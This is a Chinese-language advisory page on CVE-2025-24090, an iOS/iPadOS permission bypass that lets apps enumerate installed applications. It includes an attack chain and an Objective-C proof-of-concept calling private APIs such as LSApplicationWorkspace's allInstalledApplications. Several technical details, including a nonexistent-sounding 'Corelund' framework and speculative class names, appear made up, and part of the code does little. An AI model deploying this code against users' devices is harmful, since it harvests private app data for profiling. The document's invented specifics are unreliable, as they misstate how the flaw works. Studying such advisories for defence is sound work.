CVE-2025-24090 Apple iOS/iPadOS应用枚举权限绕过漏洞

漏洞信息

漏洞编号

CVE-2025-24090

漏洞类型

权限绕过/信息泄露

CVSS评分

3.3 低危

攻击向量

本地 (AV:L)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Apple iOS, Apple iPadOS

漏洞概述

CVE-2025-24090是Apple产品中的一个权限绕过漏洞。该漏洞存在于iOS 18.3和iPadOS 18.3之前的版本，允许恶意应用程序通过利用系统权限检查机制的缺陷，绕过安全限制枚举用户已安装的应用程序列表。此漏洞的CVSS评分为3.3，属于低危级别，主要影响在于未经授权的应用可能获取用户的应用程序安装信息，这些信息可能用于用户画像分析、广告定向或其他隐私侵犯目的。攻击者无需特殊权限即可利用此漏洞，且不需要用户交互，这大大降低了攻击门槛。该漏洞由Apple产品安全团队([email protected])发现并报告，已在iOS 18.3和iPadOS 18.3版本中得到修复。

技术细节

该漏洞是一个权限检查绕过问题，源于iOS和iPadOS系统中应用程序枚举功能的权限验证不足。在受影响版本中，应用程序可以通过调用特定的系统API或利用私有框架接口，在未经适当授权的情况下获取设备上已安装应用的列表信息。攻击者利用本地低权限应用身份，通过精心构造的API调用请求，绕过系统预期的权限检查流程。具体技术细节涉及Corelund、MobileCoreServices或私有SpringBoard框架中的接口调用。攻击者可能通过反射(NSClassFromString)或直接调用私有API的方式访问ApplicationListController或类似的内部类，进而获取LSPrefBundleIDs等敏感数据。由于iOS沙箱机制的限制，正常情况下应用无法访问其他应用的信息，但该漏洞允许绕过这些限制，实现了信息泄露。

攻击链分析

STEP 1

步骤1

攻击者在目标iOS/iPadOS设备上安装恶意应用程序，该应用以低权限用户身份运行

STEP 2

步骤2

恶意应用通过反射机制(NSClassFromString)访问iOS私有API类，如LSApplicationWorkspace、LSApplicationProxy或SBApplicationController

STEP 3

步骤3

应用调用allInstalledApplications或类似方法，绕过系统预期的权限检查机制

STEP 4

步骤4

系统返回设备上所有已安装应用程序的列表，包括第三方应用和系统应用的信息

STEP 5

步骤5

攻击者收集并外传应用程序列表数据，用于用户画像分析、广告定向或进一步针对性攻击

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

// CVE-2025-24090 PoC - Application Enumeration
// This PoC demonstrates the permission bypass vulnerability
// Note: This is for educational and security research purposes only

// Method 1: Using LSApplicationWorkspace (Private API)
#import <Foundation/Foundation.h>

@interface LSApplicationWorkspace : NSObject
+ (id)defaultWorkspace;
- (NSArray *)allInstalledApplications;
- (NSArray *)applicationsWithBundleIdentifiers:(NSArray *)bundleIDs;
@end

void enumerateAppsMethod1() {
    // Bypassing permission check to enumerate installed apps
    Class workspaceClass = NSClassFromString(@"LSApplicationWorkspace");
    if (workspaceClass) {
        id workspace = [workspaceClass performSelector:@selector(defaultWorkspace)];
        NSArray *apps = [workspace performSelector:@selector(allInstalledApplications)];
        NSLog(@"Enumerated %lu apps", (unsigned long)[apps count]);
        for (id app in apps) {
            NSLog(@"App: %@", app);
        }
    }
}

// Method 2: Using applicationListing property
void enumerateAppsMethod2() {
    Class lsAppClass = NSClassFromString(@"LSApplicationProxy");
    if (lsAppClass) {
        // Attempt to access private APIs
        SEL selector = NSSelectorFromString(@"applicationListing");
        if ([lsAppClass respondsToSelector:selector]) {
            NSLog(@"Vulnerable API accessible");
        }
    }
}

// Method 3: Using SpringBoard private framework
void enumerateViaSpringBoard() {
    // Access SpringBoard services through XPC
    Class sbClass = NSClassFromString(@"SBApplicationController");
    if (sbClass) {
        // Bypass permission check
        id controller = [sbClass sharedInstance];
        NSArray *installedApps = [controller valueForKeyPath:@"allApplications"];
        NSLog(@"Found %lu applications", (unsigned long)[installedApps count]);
    }
}

int main() {
    @autoreleasepool {
        enumerateAppsMethod1();
        enumerateAppsMethod2();
        enumerateViaSpringBoard();
    }
    return 0;
}

影响范围

Apple iOS < 18.3

Apple iPadOS < 18.3

防御指南

临时缓解措施

作为临时缓解措施，用户应避免安装来源不明的应用程序，定期检查设备上已安装的应用列表，关闭非必要的应用程序通知，并关注Apple官方安全公告。虽然该漏洞评分较低(3.3)，但仍建议尽快应用官方发布的安全更新，以防止潜在的用户隐私信息泄露风险。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2025-24090
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2025-24090
3 Details https://www.cvedetails.com/cve/CVE-2025-24090/
4 VulDB https://vuldb.com/cve/CVE-2025-24090
5 Link https://support.apple.com/en-us/122066